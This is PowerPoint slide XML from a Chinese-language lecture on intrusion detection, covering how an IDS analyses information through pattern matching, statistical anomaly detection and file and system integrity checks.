          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="755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一个过程（例如执行某一条指令）</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0" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1211580" y="3465195"/>
            <a:ext cx="2780030" cy="1597660"/>
            <a:chOff x="1868" y="6308"/>
            <a:chExt cx="4378" cy="2516"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="88900" dist="101600" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="图片 35"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1868" y="6308"/>
              <a:ext cx="4378" cy="2517"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:srgbClr val="153D98">
                  <a:alpha val="40000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1868" y="6450"/>
              <a:ext cx="2699" cy="623"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:srgbClr val="C3E8F6">
                  <a:alpha val="99000"/>
                </a:srgbClr>
              </a:glow>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:srgbClr val="153D98">
                  <a:alpha val="40000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr">
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" latinLnBrk="1" hangingPunct="0">
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" sz="2000" b="1"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微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>收集到的信息</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3475" y="8125"/>
              <a:ext cx="2771" cy="623"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:srgbClr val="C3E8F6">
                  <a:alpha val="99000"/>
                </a:srgbClr>
              </a:glow>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:srgbClr val="153D98">
                  <a:alpha val="40000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr">
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" latinLnBrk="1" hangingPunct="0">
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" sz="2000" b="1"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微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>已知攻击模式</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2202815" y="5387975"/>
            <a:ext cx="778573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将收集到的信息与</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>已知的入侵行为模式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行比较</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8FB0561-4EC2-49CB-939F-E856C07A8B4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息分析</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4602480" y="3547110"/>
            <a:ext cx="6506845" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10247" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="930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观测值无偏差</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>——</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>无入侵行为发生</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="87" name="组合 86"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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90" name="组合 89"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4615180" y="4049395"/>
            <a:ext cx="6737350" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10610" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="966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观测值有偏差</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>——</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>存在入侵发生</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="92" name="组合 91"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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0" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4199255" y="1633855"/>
            <a:ext cx="71539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入侵检测常用的异常发现方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3990340" y="2167890"/>
            <a:ext cx="7351395" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="11577" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="1025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构建系统对象正常情况下的统计测量属性</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3991610" y="2877820"/>
            <a:ext cx="6393180" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="10068" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="8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将当前观察值与统计测量属性进行比较</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0" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1211580" y="3465195"/>
            <a:ext cx="2780030" cy="1598295"/>
            <a:chOff x="1868" y="6308"/>
            <a:chExt cx="4378" cy="2517"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="88900" dist="101600" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="图片 35"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1868" y="6308"/>
              <a:ext cx="4378" cy="2517"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:srgbClr val="153D98">
                  <a:alpha val="40000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1868" y="6450"/>
              <a:ext cx="2699" cy="623"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:srgbClr val="C3E8F6">
                  <a:alpha val="99000"/>
                </a:srgbClr>
              </a:glow>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:srgbClr val="153D98">
                  <a:alpha val="40000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr">
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" latinLnBrk="1" hangingPunct="0">
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" sz="2000" b="1"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微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>当前观察值</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2723" y="8125"/>
              <a:ext cx="3523" cy="623"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:srgbClr val="C3E8F6">
                  <a:alpha val="99000"/>
                </a:srgbClr>
              </a:glow>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:srgbClr val="153D98">
                  <a:alpha val="40000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr">
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" latinLnBrk="1" hangingPunct="0">
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" sz="2000" b="1"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微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>正常统计测量属性</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2202815" y="5387975"/>
            <a:ext cx="8759594"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将系统对象观测值与</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>正常测量属性</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行对比，发现偏差</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49164" name="组合 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1454727" y="1207290"/>
            <a:ext cx="2067791" cy="1646084"/>
            <a:chOff x="141995" y="4214818"/>
            <a:chExt cx="1428760" cy="1425427"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49165" name="Picture 11" descr="DP_circle001"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="142844" y="4214818"/>
              <a:ext cx="1425427" cy="1425427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49166" name="TextBox 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="141995" y="4463187"/>
              <a:ext cx="1428760" cy="932817"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>统计</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>分析</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBD80A92-CE51-4ED3-A469-62AAC532CFC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息分析</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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4199255" y="1633855"/>
            <a:ext cx="71539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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关注文件或系统对象是否被非法更改</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3990340" y="2327910"/>
            <a:ext cx="7351395" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="11577" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="1025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sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>文件的内容和属性</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>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rPr>
                  <a:t>1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="组合 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3991610" y="3014980"/>
            <a:ext cx="6393180" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="10068" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="8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sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>目录的内容和属性</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>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rPr>
                  <a:t>2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1948071" y="5387975"/>
            <a:ext cx="84367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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在发现被恶意代码感染的应用程序方面效果特别明显</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49161" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1517073" y="1049483"/>
            <a:ext cx="2116325" cy="1695768"/>
            <a:chOff x="142844" y="1343811"/>
            <a:chExt cx="1624037" cy="1624037"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49162" name="Picture 5" descr="DO_circle001"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="142844" y="1343811"/>
              <a:ext cx="1624037" cy="1624037"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49163" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="236635" y="1664123"/>
              <a:ext cx="1369929" cy="1031652"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="A25D0A"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>完整性分析</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4003040" y="3682365"/>
            <a:ext cx="6393180" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="10068" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="8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sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>其他系统对象的内容和属性</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
